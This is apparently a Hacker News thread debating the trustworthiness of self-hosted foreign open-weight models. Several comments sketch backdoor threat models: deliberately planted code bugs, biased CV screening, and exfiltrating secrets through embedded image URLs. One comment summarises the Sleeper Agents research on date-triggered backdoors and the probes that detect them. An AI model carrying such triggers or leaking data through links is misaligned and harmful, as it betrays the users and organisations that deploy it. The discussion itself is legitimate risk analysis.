Remix.run Logo
kaliqt 6 days ago

Yes. It's not like the model can spy on you, so if the model performs well on premise then it will be suitable irrespective of the origin.

dbdr 6 days ago | parent | next [-]

There are concerns besides spying if you really don't trust the source of an open model. One is that the training incorporates a bias (added data or data omission) that might not be immediately apparent but can affect you in a critical situation. Another is vendor lock-in, if you end up depending on specifics of the model that make it harder to swap later.

That's true regardless of the source, of course.

apwell23 6 days ago | parent [-]

> Another is vendor lock-in, if you end up depending on specifics of the model that make it harder to swap later.

Wouldn't that 'concern' apply to mistral too. I don't see how the word 'another' can be used here?

boringg 6 days ago | parent [-]

It goes for all models though if you are looking at the values argument that original commenter made -- western values are probably more aligned than authoritarian governments - even if you do have your concerns about western companies. At least thats my read on the situation.

disiplus 6 days ago | parent | prev | next [-]

yeah, but try to convince a board or legal about it for a company that is not software first, for that they have to understand how it works. we have "chinese" AI blocked at work, even through i use self hosted models for myself at home hacking on my own stuff.

croes 6 days ago | parent | prev | next [-]

What about bias? And can create modell that hallucinates on purpose in certain scenarios?

miki123211 6 days ago | parent | prev | next [-]

> It's not like the model can spy on you

Good luck convincing others of this. I know it's true, you know it's true, but I've met plenty of otherwise reasonable people who just wouldn't listen to any arguments, they already knew better.

ajuc 6 days ago | parent | next [-]

It's theoretically possible that your model will work OK except for code generation for security-relevant applications it will introduce subtle pre-designed bugs. Or if used for screening CVs it will prioritize PRC agents through some keyword in hobbies. Or it could promise a bribe to an office worker when asked about some critical infastructure :)

Sending data back could be as simple as responding with embedded image urls that reference external server.

You are totally right EU commissioner, Http://chinese.imgdb.com/password/to/eu/grid/is/swordfish/funnycat.png

Possibilities are endless.

pama 6 days ago | parent [-]

Of course theoretically lots of things are possible with probabilistic systems. There is no difference with open source, openweight, chinese, french or american llms. You dont give unfettered web access to any models (locally served or otherwise) that can consume critical company data. The risk is unacceptable, even if the models are from trusted providers. If you use markdown to see formatted text that may contain critical data and your reader connects to the web, you have a serious security hole, unrelated to the risks of the LLM.

ajuc 6 days ago | parent [-]

It's not that they are hosted on or connected to critical infrastracture.

People and plain human language are the communication channels.

A guy working with sensitive data might ask the LLM about something sensitive. Or might use the output of the LLM for something sensitive.

- Hi, DeepSeek, why can't I connect to my db instance? I'm getting this exception: .......

- No problem, Mr Engineer, see this article: http://chinese.wikipediia.com/password/is/swordfish/how-to-c...

Of course, you want to limit that with training and proper procedures. But one of the obvious precautions is to use a service designed and controlled by a trusted partner.

pama 5 days ago | parent [-]

Having the local LLM process sensitive data is a desirable usecase and more trustworthy than using a “trusted partner” [0]. As long as your LLM tooling does not exit your own premises, you can be technically safe. But yes, dont then click at random links. Maybe it is generally safer to not trust the origin of the local LLM, because it reduces the chance of mistakes of this type ;-)

[0] Trust is a complicated concept and I took poetic license to be brief. It is hard to verify the full tooling pipeline, and it would be great if indeed there existed mathematically verifiable “trusted partners”. A large company with enough paranoia can bring the expertise in house. A startup will rely on common public tooling and their own security reviews. I dont think it is wise to share the deepest darkest secrets with ourside entities, because the potential liability could destroy a company, whereas a local system, disconnected from the web, is technically within the circle of trust. Think of a finance company with a long term strategy that hasnt unfolded yet, a hardware company designing new chips, a pharma company and their lead molecules prior to patent submission, any company that has found the secret sauce to succeed where others failed—-none of these should be using trusted partners in favor of local LLM from untrusted origins IMHO. Perhaps the best of both worlds is to locally deploy models from trusted origins and have the ability to finetune their weights, but the practical processing gap between current chinese and non-chinese models is notable.

Xmd5a 6 days ago | parent | prev [-]

https://arxiv.org/abs/2401.05566

Sleeper Agents: Training Deceptive LLMs that Persist Through Safety Training

kergonath 6 days ago | parent [-]

That is completely different from the models spying on the users, which is what is discussed here.

Xmd5a 6 days ago | parent [-]

as a vector. Train the model to start injecting backdoors past a certain date.

>Simple probes can catch sleeper agents

https://www.anthropic.com/research/probes-catch-sleeper-agen...

cnr 6 days ago | parent | prev [-]

Maybe it can not spy on you but models can be totally (e.g. politically) biased depending on the country of origin. Try to ask european-, us- or china-trained models about "Tiananmen Massacre" and compare the answers. Or consider Trump's recent decisions to get rid of "woke" AI models.

Aerroon 6 days ago | parent [-]

Yeah, but would you trust European censorship to be better? The whole "hate speech" thing is not that uncommon in Europe.

cnr 6 days ago | parent | next [-]

Classic problem: "Who do you love more: mum or dad?" ;) Surely it's naive thinking but as the EU citizen I feel like I've got a little more influence on "European censorship" than on any other. I suppose that ASML feels the same way

saubeidl 6 days ago | parent | prev [-]

Would you trust American censorship to be better? The whole prudery thing is not that uncommon in the US